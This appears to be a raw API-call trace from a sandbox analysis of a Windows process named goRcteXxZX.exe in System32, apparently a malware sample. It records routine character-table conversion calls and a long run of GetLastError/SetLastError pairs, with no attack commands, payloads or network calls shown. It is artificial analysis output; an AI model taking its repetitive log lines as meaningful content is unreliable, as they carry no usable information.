[0030.921] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f3e4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0030.921] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f3e4, cbMultiByte=256, lpWideCharStr=0x26ed18, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ喳矲狟Ā") returned 256 [0030.921] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ喳矲狟Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0030.921] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ喳矲狟Ā", cchSrc=256, lpDestStr=0x26eb08, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0030.922] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x26f2e4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ½a\x99õ\x1cõ&", lpUsedDefaultChar=0x0) returned 256 [0030.922] GetLastError () returned 0x0 [0030.922] SetLastError (dwErrCode=0x0) [0030.922] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f3e4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0030.922] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f3e4, cbMultiByte=256, lpWideCharStr=0x26ed38, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ喳矲狟Ā") returned 256 [0030.922] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ喳矲狟Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0030.922] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ喳矲狟Ā", cchSrc=256, lpDestStr=0x26eb28, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0030.922] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x26f1e4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ½a\x99õ\x1cõ&", lpUsedDefaultChar=0x0) returned 256 [0030.922] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72e0d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0030.922] GetLastError () returned 0x0 [0030.922] SetLastError (dwErrCode=0x0) [0030.922] GetLastError () returned 0x0 [0030.922] SetLastError (dwErrCode=0x0) [0030.922] GetLastError () returned 0x0 [0030.922] SetLastError (dwErrCode=0x0) [0030.922] GetLastError () returned 0x0 [0030.922] SetLastError (dwErrCode=0x0) [0030.922] GetLastError () returned 0x0 [0030.922] SetLastError (dwErrCode=0x0) [0030.922] GetLastError () returned 0x0 [0030.922] SetLastError (dwErrCode=0x0) [0030.922] GetLastError () returned 0x0 [0030.922] SetLastError (dwErrCode=0x0) [0030.922] GetLastError () returned 0x0 [0030.922] SetLastError (dwErrCode=0x0) [0030.922] GetLastError () returned 0x0 [0030.923] SetLastError (dwErrCode=0x0) [0030.923] GetLastError () returned 0x0 [0030.923] SetLastError (dwErrCode=0x0) [0030.923] GetLastError () returned 0x0 [0030.923] SetLastError (dwErrCode=0x0) [0030.923] GetLastError () returned 0x0 [0030.923] SetLastError (dwErrCode=0x0) [0030.923] GetLastError () returned 0x0 [0030.923] SetLastError (dwErrCode=0x0) [0030.923] GetLastError () returned 0x0 [0030.923] SetLastError (dwErrCode=0x0) [0030.923] GetLastError () returned 0x0 [0030.923] SetLastError (dwErrCode=0x0) [0030.923] GetLastError () returned 0x0 [0030.923] SetLastError (dwErrCode=0x0) [0030.923] GetLastError () returned 0x0 [0030.923] SetLastError (dwErrCode=0x0) [0030.923] GetLastError () returned 0x0 [0030.923] SetLastError (dwErrCode=0x0) [0030.923] GetLastError () returned 0x0 [0030.923] SetLastError (dwErrCode=0x0) [0030.923] GetLastError () returned 0x0 [0030.923] SetLastError (dwErrCode=0x0) [0030.923] GetLastError () returned 0x0 [0030.924] SetLastError (dwErrCode=0x0) [0030.924] GetLastError () returned 0x0 [0030.924] SetLastError (dwErrCode=0x0) [0030.924] GetLastError () returned 0x0 [0030.924] SetLastError (dwErrCode=0x0) [0030.924] GetLastError () returned 0x0 [0030.924] SetLastError (dwErrCode=0x0) [0030.924] GetLastError () returned 0x0 [0030.924] SetLastError (dwErrCode=0x0) [0030.924] GetLastError () returned 0x0 [0030.924] SetLastError (dwErrCode=0x0) [0030.924] GetLastError () returned 0x0 [0030.924] SetLastError (dwErrCode=0x0) [0030.924] GetLastError () returned 0x0 [0030.924] SetLastError (dwErrCode=0x0) [0030.924] GetLastError () returned 0x0 [0030.924] SetLastError (dwErrCode=0x0) [0030.924] GetLastError () returned 0x0 [0030.924] SetLastError (dwErrCode=0x0) [0030.924] GetLastError () returned 0x0 [0030.924] SetLastError (dwErrCode=0x0) [0030.924] GetLastError () returned 0x0 [0030.924] SetLastError (dwErrCode=0x0) [0030.924] GetLastError () returned 0x0 [0030.925] SetLastError (dwErrCode=0x0) [0030.925] GetLastError () returned 0x0 [0030.925] SetLastError (dwErrCode=0x0) [0030.925] GetLastError () returned 0x0 [0030.925] SetLastError (dwErrCode=0x0) [0030.925] GetLastError () returned 0x0 [0030.925] SetLastError (dwErrCode=0x0) [0030.925] GetLastError () returned 0x0 [0030.925] SetLastError (dwErrCode=0x0) [0030.925] GetLastError () returned 0x0 [0030.925] SetLastError (dwErrCode=0x0) [0030.925] GetLastError () returned 0x0 [0030.925] SetLastError (dwErrCode=0x0) [0030.925] GetLastError () returned 0x0 [0030.925] SetLastError (dwErrCode=0x0) [0030.925] GetLastError () returned 0x0 [0030.925] SetLastError (dwErrCode=0x0) [0030.925] GetLastError () returned 0x0 [0030.925] SetLastError (dwErrCode=0x0) [0030.925] GetLastError () returned 0x0 [0030.925] SetLastError (dwErrCode=0x0) [0030.925] GetLastError () returned 0x0 [0030.925] SetLastError (dwErrCode=0x0) [0030.925] GetLastError () returned 0x0 [0030.925] SetLastError (dwErrCode=0x0) [0030.925] GetLastError () returned 0x0 [0030.926] SetLastError (dwErrCode=0x0) [0030.926] GetLastError () returned 0x0 [0030.926] SetLastError (dwErrCode=0x0) [0030.926] GetLastError () returned 0x0 [0030.926] SetLastError (dwErrCode=0x0) [0030.926] GetLastError () returned 0x0 [0030.926] SetLastError (dwErrCode=0x0) [0030.926] GetLastError () returned 0x0 [0030.926] SetLastError (dwErrCode=0x0) [0030.926] GetLastError () returned 0x0 [0030.926] SetLastError (dwErrCode=0x0) [0030.926] GetLastError () returned 0x0 [0030.926] SetLastError (dwErrCode=0x0) [0030.926] GetLastError () returned 0x0 [0030.926] SetLastError (dwErrCode=0x0) [0030.926] GetLastError () returned 0x0 [0030.926] SetLastError (dwErrCode=0x0) [0030.926] GetLastError () returned 0x0 [0030.926] SetLastError (dwErrCode=0x0) [0030.926] GetLastError () returned 0x0 [0030.926] SetLastError (dwErrCode=0x0) [0030.926] GetLastError () returned 0x0 [0030.926] SetLastError (dwErrCode=0x0) [0030.926] GetLastError () returned 0x0 [0030.926] SetLastError (dwErrCode=0x0) [0030.926] GetLastError () returned 0x0 [0030.926] SetLastError (dwErrCode=0x0) [0030.926] GetLastError () returned 0x0 [0030.926] SetLastError (dwErrCode=0x0) [0030.926] GetLastError () returned 0x0 [0030.927] SetLastError (dwErrCode=0x0) [0030.927] GetLastError () returned 0x0 [0030.927] SetLastError (dwErrCode=0x0) [0030.927] GetLastError () returned 0x0 [0030.927] SetLastError (dwErrCode=0x0) [0030.927] GetLastError () returned 0x0 [0030.927] SetLastError (dwErrCode=0x0) [0030.927] GetLastError () returned 0x0 [0030.927] SetLastError (dwErrCode=0x0) [0030.927] GetLastError () returned 0x0 [0030.927] SetLastError (dwErrCode=0x0) [0030.927] GetLastError () returned 0x0 [0030.927] SetLastError (dwErrCode=0x0) [0030.927] GetLastError () returned 0x0 [0030.927] SetLastError (dwErrCode=0x0) [0030.927] GetLastError () returned 0x0 [0030.927] SetLastError (dwErrCode=0x0) [0030.927] GetLastError () returned 0x0 [0030.927] SetLastError (dwErrCode=0x0) [0030.927] GetLastError () returned 0x0 [0030.927] SetLastError (dwErrCode=0x0) [0030.927] GetLastError () returned 0x0 [0030.927] SetLastError (dwErrCode=0x0) [0030.927] GetLastError () returned 0x0 [0030.927] SetLastError (dwErrCode=0x0) [0030.927] GetLastError () returned 0x0 [0030.927] SetLastError (dwErrCode=0x0) [0030.928] GetLastError () returned 0x0 [0030.928] SetLastError (dwErrCode=0x0) [0030.928] GetLastError () returned 0x0 [0030.928] SetLastError (dwErrCode=0x0) [0030.928] GetLastError () returned 0x0 [0030.928] SetLastError (dwErrCode=0x0) [0030.928] GetLastError () returned 0x0 [0030.928] SetLastError (dwErrCode=0x0) [0030.928] GetLastError () returned 0x0 [0030.928] SetLastError (dwErrCode=0x0) [0030.928] GetLastError () returned 0x0 [0030.928] SetLastError (dwErrCode=0x0) [0030.928] GetLastError () returned 0x0 [0030.928] SetLastError (dwErrCode=0x0) [0030.928] GetLastError () returned 0x0 [0030.928] SetLastError (dwErrCode=0x0) [0030.928] GetLastError () returned 0x0 [0030.928] SetLastError (dwErrCode=0x0) [0030.928] GetLastError () returned 0x0 [0030.928] SetLastError (dwErrCode=0x0) [0030.928] GetLastError () returned 0x0 [0030.928] SetLastError (dwErrCode=0x0) [0030.928] GetLastError () returned 0x0 [0030.928] SetLastError (dwErrCode=0x0) [0030.928] GetLastError () returned 0x0 [0030.928] SetLastError (dwErrCode=0x0) [0030.928] GetLastError () returned 0x0 [0030.928] SetLastError (dwErrCode=0x0) [0030.928] GetLastError () returned 0x0 [0030.928] SetLastError (dwErrCode=0x0) [0030.928] GetLastError () returned 0x0 [0030.929] SetLastError (dwErrCode=0x0) [0030.929] GetLastError () returned 0x0 [0030.929] SetLastError (dwErrCode=0x0) [0030.929] GetLastError () returned 0x0 [0030.929] SetLastError (dwErrCode=0x0) [0030.929] GetLastError () returned 0x0 [0030.929] SetLastError (dwErrCode=0x0) [0030.929] GetLastError () returned 0x0 [0030.929] SetLastError (dwErrCode=0x0) [0030.929] GetLastError () returned 0x0 [0030.929] SetLastError (dwErrCode=0x0) [0030.929] GetLastError () returned 0x0 [0030.929] SetLastError (dwErrCode=0x0) [0030.929] GetLastError () returned 0x0 [0030.929] SetLastError (dwErrCode=0x0) [0030.929] GetLastError () returned 0x0 [0030.929] SetLastError (dwErrCode=0x0) [0030.929] GetLastError () returned 0x0 [0030.929] SetLastError (dwErrCode=0x0) [0030.929] GetLastError () returned 0x0 [0030.929] SetLastError (dwErrCode=0x0) [0030.929] GetLastError () returned 0x0 [0030.929] SetLastError (dwErrCode=0x0) [0030.929] GetLastError () returned 0x0 [0030.929] SetLastError (dwErrCode=0x0) [0030.929] GetLastError () returned 0x0 [0030.929] SetLastError (dwErrCode=0x0) [0030.929] GetLastError () returned 0x0 [0030.929] SetLastError (dwErrCode=0x0) [0030.929] GetLastError () returned 0x0 [0030.930] SetLastError (dwErrCode=0x0) [0030.930] GetLastError () returned 0x0 [0030.930] SetLastError (dwErrCode=0x0) [0030.930] GetLastError () returned 0x0 [0030.930] SetLastError (dwErrCode=0x0) [0030.930] GetLastError () returned 0x0 [0030.930] SetLastError (dwErrCode=0x0) [0030.930] GetLastError () returned 0x0 [0030.930] SetLastError (dwErrCode=0x0) [0030.930] GetLastError () returned 0x0 [0030.930] SetLastError (dwErrCode=0x0) [0030.930] GetLastError () returned 0x0 [0030.930] SetLastError (dwErrCode=0x0) [0030.930] GetLastError () returned 0x0 [0030.930] SetLastError (dwErrCode=0x0) [0030.930] GetLastError () returned 0x0 [0030.930] SetLastError (dwErrCode=0x0) [0030.930] GetLastError () returned 0x0 [0030.930] SetLastError (dwErrCode=0x0) [0030.930] GetLastError () returned 0x0 [0030.930] SetLastError (dwErrCode=0x0) [0030.930] GetLastError () returned 0x0 [0030.930] SetLastError (dwErrCode=0x0) [0030.930] GetLastError () returned 0x0 [0030.930] SetLastError (dwErrCode=0x0) [0030.930] GetLastError () returned 0x0 [0030.930] SetLastError (dwErrCode=0x0) [0030.930] GetLastError () returned 0x0 [0030.930] SetLastError (dwErrCode=0x0) [0030.930] GetLastError () returned 0x0 [0030.930] SetLastError (dwErrCode=0x0) [0030.930] GetLastError () returned 0x0 [0030.931] SetLastError (dwErrCode=0x0) [0030.931] GetLastError () returned 0x0 [0030.931] SetLastError (dwErrCode=0x0) [0030.931] GetLastError () returned 0x0 [0030.931] SetLastError (dwErrCode=0x0) [0030.931] GetLastError () returned 0x0 [0030.931] SetLastError (dwErrCode=0x0) [0030.931] GetLastError () returned 0x0 [0030.931] SetLastError (dwErrCode=0x0) [0030.931] GetLastError () returned 0x0 [0030.931] SetLastError (dwErrCode=0x0) [0030.931] GetLastError () returned 0x0 [0030.931] SetLastError (dwErrCode=0x0) [0030.931] GetLastError () returned 0x0 [0030.931] SetLastError (dwErrCode=0x0) [0030.931] GetLastError () returned 0x0 [0030.931] SetLastError (dwErrCode=0x0) [0030.931] GetLastError () returned 0x0 [0030.931] SetLastError (dwErrCode=0x0) [0030.931] GetLastError () returned 0x0 [0030.931] SetLastError (dwErrCode=0x0) [0030.931] GetLastError () returned 0x0 [0030.931] SetLastError (dwErrCode=0x0) [0030.931] GetLastError () returned 0x0 [0030.931] SetLastError (dwErrCode=0x0) [0030.931] GetLastError () returned 0x0 [0030.931] SetLastError (dwErrCode=0x0) [0030.931] GetLastError () returned 0x0 [0030.931] SetLastError (dwErrCode=0x0) [0030.931] GetLastError () returned 0x0 [0030.931] SetLastError (dwErrCode=0x0) [0030.932] GetLastError () returned 0x0 [0030.932] SetLastError (dwErrCode=0x0) [0030.932] GetLastError () returned 0x0 [0030.932] SetLastError (dwErrCode=0x0) [0030.932] GetLastError () returned 0x0 [0030.932] SetLastError (dwErrCode=0x0) [0030.932] GetLastError () returned 0x0 [0030.932] SetLastError (dwErrCode=0x0) [0030.932] GetLastError () returned 0x0 [0030.932] SetLastError (dwErrCode=0x0) [0030.932] GetLastError () returned 0x0 [0030.932] SetLastError (dwErrCode=0x0) [0030.932] GetLastError () returned 0x0 [0030.932] SetLastError (dwErrCode=0x0) [0030.932] GetLastError () returned 0x0 [0030.932] SetLastError (dwErrCode=0x0) [0030.932] GetLastError () returned 0x0 [0030.932] SetLastError (dwErrCode=0x0) [0030.932] GetLastError () returned 0x0 [0030.932] SetLastError (dwErrCode=0x0) [0030.932] GetLastError () returned 0x0 [0030.932] SetLastError (dwErrCode=0x0) [0030.932] GetLastError () returned 0x0 [0030.932] SetLastError (dwErrCode=0x0) [0030.932] GetLastError () returned 0x0 [0030.932] SetLastError (dwErrCode=0x0) [0030.932] GetLastError () returned 0x0 [0030.932] SetLastError (dwErrCode=0x0) [0030.932] GetLastError () returned 0x0 [0030.932] SetLastError (dwErrCode=0x0) [0030.932] GetLastError () returned 0x0 [0030.933] SetLastError (dwErrCode=0x0) [0030.933] GetLastError () returned 0x0 [0030.933] SetLastError (dwErrCode=0x0) [0030.933] GetLastError () returned 0x0 [0030.933] SetLastError (dwErrCode=0x0) [0030.933] GetLastError () returned 0x0 [0030.933] SetLastError (dwErrCode=0x0) [0030.933] GetLastError () returned 0x0 [0030.933] SetLastError (dwErrCode=0x0) [0030.933] GetLastError () returned 0x0 [0030.933] SetLastError (dwErrCode=0x0) [0030.933] GetLastError () returned 0x0 [0030.933] SetLastError (dwErrCode=0x0) [0030.933] GetLastError () returned 0x0 [0030.933] SetLastError (dwErrCode=0x0) [0030.933] GetLastError () returned 0x0 [0030.933] SetLastError (dwErrCode=0x0) [0030.933] GetLastError () returned 0x0 [0030.933] SetLastError (dwErrCode=0x0) [0030.933] GetLastError () returned 0x0 [0030.933] SetLastError (dwErrCode=0x0) [0030.933] GetLastError () returned 0x0 [0030.933] SetLastError (dwErrCode=0x0) [0030.933] GetLastError () returned 0x0 [0030.933] SetLastError (dwErrCode=0x0) [0030.933] GetLastError () returned 0x0 [0030.933] SetLastError (dwErrCode=0x0) [0030.933] GetLastError () returned 0x0 [0030.933] SetLastError (dwErrCode=0x0) [0030.933] GetLastError () returned 0x0 [0030.933] SetLastError (dwErrCode=0x0) [0030.933] GetLastError () returned 0x0 [0030.934] SetLastError (dwErrCode=0x0) [0030.934] GetLastError () returned 0x0 [0030.934] SetLastError (dwErrCode=0x0) [0030.934] GetLastError () returned 0x0 [0030.934] SetLastError (dwErrCode=0x0) [0030.934] GetLastError () returned 0x0 [0030.934] SetLastError (dwErrCode=0x0) [0030.934] GetLastError () returned 0x0 [0030.934] SetLastError (dwErrCode=0x0) [0030.934] GetLastError () returned 0x0 [0030.934] SetLastError (dwErrCode=0x0) [0030.934] GetLastError () returned 0x0 [0030.934] SetLastError (dwErrCode=0x0) [0030.934] GetLastError () returned 0x0 [0030.934] SetLastError (dwErrCode=0x0) [0030.934] GetLastError () returned 0x0 [0030.934] SetLastError (dwErrCode=0x0) [0030.934] GetLastError () returned 0x0 [0030.934] SetLastError (dwErrCode=0x0) [0030.934] GetLastError () returned 0x0 [0030.934] SetLastError (dwErrCode=0x0) [0030.934] GetLastError () returned 0x0 [0030.934] 